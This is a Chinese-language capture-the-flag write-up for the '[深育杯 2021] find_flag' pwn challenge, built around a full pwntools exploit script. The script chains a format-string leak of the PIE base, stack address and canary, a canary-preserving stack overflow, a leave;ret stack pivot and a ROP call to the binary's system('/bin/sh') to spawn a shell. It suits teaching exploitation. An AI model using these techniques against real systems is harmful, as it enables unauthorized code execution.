Problem: [深育杯 2021]find_flag
思路
- 直接用后门get flag很简单
- 尝试 getshell：二进制内已有调用 system 的代码片段（即上面的后门），因此不需要泄露 libc 地址，仅靠程序自身的 gadget 就能 getshell
EXP
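#!/usr/bin/env python3
"""Exploit for [深育杯 2021] find_flag.

Two stages, both visible in the payloads below:

1. A format-string read (``%19$p%15$p%17$p``) leaks a PIE text address,
   a stack address (used as rbp) and the stack canary.
2. A stack-buffer overflow that restores the canary and overwrites the
   saved rbp / return address so that ``leave ; ret`` pivots rsp into the
   overflowed buffer, where a tiny ROP chain calls the binary's own
   ``system`` call site with "/bin/sh".  No libc leak is needed.

Usage (pwntools ``args``):
    python3 exp.py P            # local process
    python3 exp.py R            # remote target (host/port below)
    python3 exp.py              # local, under gdb with the script below
    python3 exp.py P LIBC=...   # optional: libc to load for debugging only
"""
import os

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
# The libc is never used by the exploit itself; it is only loaded when present
# so the script still runs on a machine without this author-specific path.
libcname = args.LIBC or "/home/r3t2/.config/cpwn/pkgs/2.23-0ubuntu11.3/amd64/libc6_2.23-0ubuntu11.3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "node4.anna.nssctf.cn"
port = 28282

elf = context.binary = ELF(filename)
libc = ELF(libcname) if libcname and os.path.isfile(libcname) else None

gs = '''
b *$rebase(0x13f7)
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.23-0ubuntu11.3/amd64/libc6-dbg_2.23-0ubuntu11.3_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.23-0ubuntu11.3/amd64/glibc-source_2.23-0ubuntu11.3_all/usr/src/glibc/glibc-2.23
'''

# Offsets relative to the PIE base of pwn_patched.
LEAK_TEXT_OFFSET = 0x146f   # what %19$p points at, used to recover the base
POP_RDI_RET = 0x14e3        # 0x00000000000014e3 : pop rdi ; ret
LEAVE_RET = 0x13f7          # leave ; ret  (pivot gadget, also the gdb breakpoint)
CALL_SYSTEM = 0x1238        # the "backdoor" call to system inside the binary
BUF_BELOW_RBP = 0x40        # our input starts 0x40 bytes below the leaked rbp


def start():
    """Return a tube to the target, chosen by the P / R command-line flags."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


def leak(io):
    """Run the format-string stage and return (elf_base, stack_addr, canary).

    ``%p`` prints no leading zeros, so the PIE address and the stack address
    are always 12 hex digits here; the canary is 16 digits except on the
    ~1/16 of runs where its top nibble is zero, in which case the parse below
    fails and the run must simply be repeated.

    Raises:
        ValueError: a leaked value does not look like what it should be
            (mis-parsed output or wrong format-string offsets).
    """
    io.recvuntil(b'name')
    io.sendline(b'%19$p%15$p%17$p')

    # recvn() blocks until exactly n bytes arrived; recv(n) may return fewer
    # and would then silently produce a truncated address.
    io.recvuntil(b'0x')
    elf_base = int(io.recvn(12), 16) - LEAK_TEXT_OFFSET
    io.recvuntil(b'0x')
    stack_addr = int(io.recvn(12), 16)
    io.recvuntil(b'0x')
    canary = int(io.recvn(16), 16)

    # Cheap sanity checks: without them a bad leak only shows up as a crash
    # after the ROP chain has already been sent.
    if elf_base & 0xfff:
        raise ValueError(f"elf_base {elf_base:#x} is not page aligned; leak offset wrong?")
    if canary & 0xff:
        raise ValueError(f"canary {canary:#x} has a non-zero low byte; wrong stack slot?")

    log.info("elf_base --> " + hex(elf_base))
    log.info("stack_addr --> " + hex(stack_addr))
    log.info("canary --> " + hex(canary))
    return elf_base, stack_addr, canary


def build_payload(elf_base, stack_addr, canary):
    """Build the overflow that pivots into the buffer and calls system("/bin/sh").

    Layout relative to the start of our input (``buf = stack_addr - 0x40``):
        +0x00  "/bin/sh\\0"        argument string; also popped into rbp by the pivot
        +0x08  pop rdi ; ret
        +0x10  buf                 rdi = "/bin/sh"
        +0x18  ret                 extra ret, presumably to keep rsp 16-byte aligned
        +0x20  call system         the backdoor call site
        +0x28  16 bytes padding    up to the canary slot
        +0x38  canary              rbp-8, restored so the check passes
        +0x40  buf                 saved rbp -> after the epilogue rbp = buf
        +0x48  leave ; ret         return address -> rsp = buf, chain starts at +0x08
    """
    buf = stack_addr - BUF_BELOW_RBP
    pop_rdi_ret = elf_base + POP_RDI_RET
    ret = pop_rdi_ret + 1  # the bare `ret` byte of the same gadget
    return b''.join([
        b'/bin/sh\x00',
        p64(pop_rdi_ret),
        p64(buf),
        p64(ret),
        p64(elf_base + CALL_SYSTEM),
        b'a' * 0x10,
        p64(canary),
        p64(buf),
        p64(elf_base + LEAVE_RET),
    ])


def main():
    """Leak, overflow, shell."""
    io = start()
    elf_base, stack_addr, canary = leak(io)
    io.recvuntil(b'?')
    io.sendline(build_payload(elf_base, stack_addr, canary))
    io.interactive()


if __name__ == '__main__':
    main()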
总结
- 对该题的考点总结：① 格式化字符串漏洞任意读，一次 `%19$p%15$p%17$p` 同时泄露 PIE 基址（减去固定偏移 0x146f）、栈地址和 canary；② 栈溢出时把 canary 原样写回以绕过检查；③ 利用 `leave ; ret` 做栈迁移，把 rsp 迁到输入缓冲区（rbp-0x40）上；④ 在缓冲区内布置 `pop rdi ; ret` + "/bin/sh" 地址 + 一个额外 `ret`（用于栈对齐）+ 程序自带的 system 调用点，全程不依赖 libc 地址
